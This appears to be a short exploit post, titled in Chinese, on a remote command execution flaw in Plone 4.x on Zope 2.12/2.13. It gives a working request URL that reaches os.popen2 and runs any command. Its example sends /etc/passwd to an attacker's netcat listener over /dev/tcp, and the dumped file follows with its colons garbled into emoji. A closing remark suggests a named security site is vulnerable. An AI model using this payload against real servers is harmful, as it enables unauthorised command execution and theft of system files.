Plone zope远程命令执行漏洞(python) 全文
Versions Affected (without hotfix): Plone 4.0 (through 4.0.9); Plone
4.1; Plone 4.2 (a1 and a2); Zope 2.12.x and Zope 2.13.x.
Versions Not Affected: Versions of Plone that use Zope other than Zope
2.12.x and Zope 2.13.x.
Advisory/Hotfix: http://plone.org/products/plone/security/advisories/20110928
You can execute any command on the remote Plone server with the
following request
if the server is Unix/Linux based (Note: you won''t get returned the
results of the command):
http://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command
to run>
Example:
Listen for a connection:
$ nc -l 4040
On victim, visit:
http://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040
Response:
$ nc -l 4040
root❌0:0:root:/root:/bin/bash
bin❌1:1:bin:/bin:/sbin/nologin
daemon❌2:2:daemon:/sbin:/sbin/nologin
adm❌3:4:adm:/var/adm:/sbin/nologin
lp❌4:7:lp:/var/spool/lpd:/sbin/nologin
sync❌5:0:sync:/sbin:/bin/sync
shutdown❌6:0:shutdown:/sbin:/sbin/shutdown
halt❌7:0:halt:/sbin:/sbin/halt
mail❌8:12:mail:/var/spool/mail:/sbin/nologin
uucp❌10:14:uucp:/var/spool/uucp:/sbin/nologin
operator❌11:0:operator:/root:/sbin/nologin
games❌12💯games:/usr/games:/sbin/nologin
gopher❌13:30:gopher:/var/gopher:/sbin/nologin
ftp❌14:50:FTP User:/var/ftp:/sbin/nologin
nobody❌99:99:Nobody:/:/sbin/nologin
vcsa❌69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth❌499:499:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix❌89:89::/var/spool/postfix:/sbin/nologin
sshd❌74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp❌38:38::/etc/ntp:/sbin/nologin
tcpdump❌72:72::/:/sbin/nologin
apache❌48:48:Apache:/var/www:/sbin/nologin
mysql❌27:27:MySQL Server:/var/lib/mysql:/bin/bash
plone❌500:500::/home/plone:/bin/false
安全焦点貌似使用的就是此结构!